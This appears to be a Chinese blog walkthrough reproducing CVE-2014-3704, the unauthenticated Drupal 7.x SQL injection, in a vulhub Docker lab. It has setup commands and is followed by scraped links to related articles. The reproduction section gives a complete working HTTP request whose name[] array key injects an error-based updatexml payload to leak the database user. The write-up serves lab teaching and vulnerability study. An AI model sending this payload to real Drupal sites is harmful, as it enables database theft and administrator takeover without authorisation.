目录

漏洞介绍

影响版本

环境搭建

漏洞复现

漏洞介绍

Drupal 是一款用量庞大的CMS,其中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码

影响版本

  • 7.0-7.31

环境搭建

1.切换到drupal相关目录下,部署docker环境

cd /root/vulhub/drupal/CVE-2014-3704

docker-compose build

docker-compose up -d

2.查看docker服务器情况

dock ps -a

3.环境启动后,访问`http://your-ip:8080`即可看到Drupal的安装页面,使用默认配置安装即可。

其中,Mysql数据库名填写`drupal`,数据库用户名、密码为`root`,地址为`mysql`

4.正常访问页面如下

漏洞复现

1.利用burp的Repeater模块发送以下数据


POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

2.在Response中的Render查看返回结果

CVE-2014-3704 Drupal SQL注入漏洞相关推荐

  1. %3c?php+eval,callback噩梦:解析著名CMS框架Drupal SQL注入漏洞

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. ‍ ‍‍‍FreeBuf科普‍‍ ‍‍ ‍‍Drupal是使用PHP语言编写的开源 ...

  2. php cve-2014-8142漏洞,Drupal 7.31 SQL注入漏洞(CVE-2014-3704) EXP测试代码

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 最近频繁爆发各种0day,真是把大家累坏了.Drupal 7.31 SQL注入漏洞 ...

  3. Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现

    Drupal < 7.32 "Drupalgeddon" SQL注入漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包->信息被爆出 0x01漏 ...

  4. Apache 'mod_accounting'模块SQL注入漏洞(CVE-2013-5697)

    漏洞版本: mod_accounting 0.5 漏洞描述: BUGTRAQ ID: 62677 CVE ID: CVE-2013-5697mod_accounting是Apache 1.3.x上的流 ...

  5. guestbook.php注入,TinyGuestBook 'sign.php'多个SQL注入漏洞

    发布日期:2012-09-23 更新日期:2012-10-04 受影响系统: TinyGuestBook TinyGuestBook 描述: ----------------------------- ...

  6. WordPress ProPlayer插件‘id’参数SQL注入漏洞

    漏洞名称: WordPress ProPlayer插件'id'参数SQL注入漏洞 CNNVD编号: CNNVD-201305-468 发布时间: 2013-05-22 更新时间: 2013-05-22 ...

  7. Sophos 修复 Cyberoam OS 中的 SQL 注入漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 Sophos 公司为 Cyberoam 防火墙和路由器发布热补丁,修复一个 SQL 注入漏洞. Sophos 在2014年收购防火墙和 ...

  8. browse.php?u,phpMyRecipes browse.php SQL注入漏洞

    phpMyRecipes browse.php SQL注入漏洞 发表日期:2015-01-19 14:04:33 phpMyRecipes browse.php SQL注入漏洞 CVE-ID:CVE- ...

  9. 细数Django框架核心历史SQL注入漏洞(上)

    本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文首发于奇安信攻防社区:https://forum.butian.net/share/1923 本文仅用于技术 ...

最新文章

  1. 软件工程--软件设计
  2. PHP的 preg_match_all
  3. 数据库课程设计结论_结论
  4. Hulu诚意出品 |《百面深度学习》重磅上市
  5. 素数筛选法(埃氏筛 欧拉筛)
  6. c# 调用服务返回结果模板化
  7. 黑苹果Win与Mac时间同步工具
  8. FAT学习笔记(四)——Dir Entry
  9. 优秀logo设计解析_国外30个优秀的logo的设计思维分析
  10. 【面试】腾讯优图-计算机视觉
  11. w10系统打不开服务器共享打印机,win10系统无法共享打印机的方案
  12. 修改.srt格式字幕文件
  13. 6-10 使用函数求余弦函数的近似值 (15 分)本题要求实现一个函数,用下列公式求cos(x)的近似值,精确到最后一项的绝对值小于e:cos(x)=x0/0!−x2/2!+x4/4!−x6/
  14. AI 开发者被疯抢,华为做了什么?
  15. IE 今天正式停用!网友炸锅了
  16. 矩阵分析与应用(一)——矩阵基础知识、广义逆
  17. 冥冥之中——汶川地震嗟叹
  18. 计算机屋内设计主要是学什么的,2021建筑室内设计主要学什么 主要课程有哪些...
  19. java物业管理系统设计_JAVA版物业管理系统论文+设计源码
  20. LearnOpenGL学习笔记——几何着色器

热门文章

  1. asar 如何解密加密?electron 的 asar 的具体用法
  2. GPT“逃跑计划”曝光还想接管推特?创始人称AI仍非常受控
  3. 多人即时战斗游戏服务端系列[2]--90坦克Online游戏对象介绍以及渲染机制
  4. 在服务器里面修改油画,服务器挤爆!用GAN生成人像油画火了,带你一秒回到文艺复兴...
  5. android开发:BottomNavigationView仿今日头条底部菜单栏
  6. c#中textbox动态通过代码改变文本内容显示
  7. 百度地图 动态矢量圆 BMap Circle
  8. PyQt5的笔记(中-4)
  9. 【数字信号处理】卷积编程实现 ( 卷积计算原理 | 卷积公式计算 | 使用 matlab 计算卷积 | 使用 C 语言实现卷积计算 )
  10. sklearn tsne